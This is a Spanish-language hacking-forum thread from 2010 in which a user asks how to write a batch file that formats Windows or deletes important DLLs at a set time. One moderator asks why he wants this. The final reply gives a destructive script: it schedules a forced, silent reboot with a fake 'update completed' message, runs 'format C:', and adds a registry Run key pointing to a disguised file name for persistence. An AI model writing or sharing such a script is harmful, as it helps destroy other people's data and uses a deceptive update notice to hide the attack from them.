elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  crear un bat k formatee windows en uso o borre algun archivo importante dll..
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: crear un bat k formatee windows en uso o borre algun archivo importante dll..  (Leído 4,344 veces)
Rinformatic

Desconectado Desconectado

Mensajes: 18


Ver Perfil
crear un bat k formatee windows en uso o borre algun archivo importante dll..
« en: 6 Julio 2010, 23:16 pm »

ola a todo este fantastico foro y su gente mi duda es si se puede hacer un bat k a un dia y una hora haga un formateo a mi ekipo x ejemplo para probrarlo pero el problema es k k tendria k poner en el block de notas xk al estar el windows en uso no se si primero ai k mandarle un comando de reinicio como shutdown y luego format c: no se ando un poco perdido a ver si alguien me podria ayudar , en espera de sus gratas respuestas, un saludo


En línea

leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: crear un bat k formatee windows en uso o borre algun archivo importante dll..
« Respuesta #1 en: 6 Julio 2010, 23:52 pm »

No se puede formatear Windows en uso.

¿Para qué quieres hacer eso?


En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Rinformatic

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: crear un bat k formatee windows en uso o borre algun archivo importante dll..
« Respuesta #2 en: 7 Julio 2010, 19:40 pm »

y no ai ninguna forma de dejar k el windows este en uso y el bat haga el formato al dejarselo dixo antes de reinciar?
En línea

leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: crear un bat k formatee windows en uso o borre algun archivo importante dll..
« Respuesta #3 en: 7 Julio 2010, 19:52 pm »

No, el disco en uso no se puede formatear, otros discos sí.
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
FerJGS

Desconectado Desconectado

Mensajes: 75


Ver Perfil
Re: crear un bat k formatee windows en uso o borre algun archivo importante dll..
« Respuesta #4 en: 14 Julio 2010, 19:07 pm »

Sería algo como

@echo off
AT XX:XX shutdown -r -f -q -c La actualizaci¢n ha finalizado correctamente, es preciso reiniciar el equipo
format C:/>nul
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v sysin2 /t REG_SZ /d "c:/windows/system32/windosx.bat"

Espero que te funcione
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Formatear Windows sin que se borre el progreso de los juegos
Software
gary89 4 2,758 Último mensaje 15 Agosto 2011, 15:20 pm
por simorg
Virus que formatee
Análisis y Diseño de Malware
zZsamuelZz4 3 2,517 Último mensaje 2 Septiembre 2014, 05:49 am
por .:UND3R:.
Archivo vbs que borre carpeta escritorio.
Análisis y Diseño de Malware
cybercristina30 7 5,957 Último mensaje 8 Agosto 2016, 05:21 am
por tincopasan
He perdido un archivo importante « 1 2 »
Seguridad
fcf123 11 8,897 Último mensaje 5 Octubre 2020, 03:06 am
por Serapis
crear archivo con variable de entorno c++ windows
Programación C/C++
soyloqbuskas 3 3,337 Último mensaje 12 Diciembre 2023, 14:38 pm
por soyloqbuskas
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines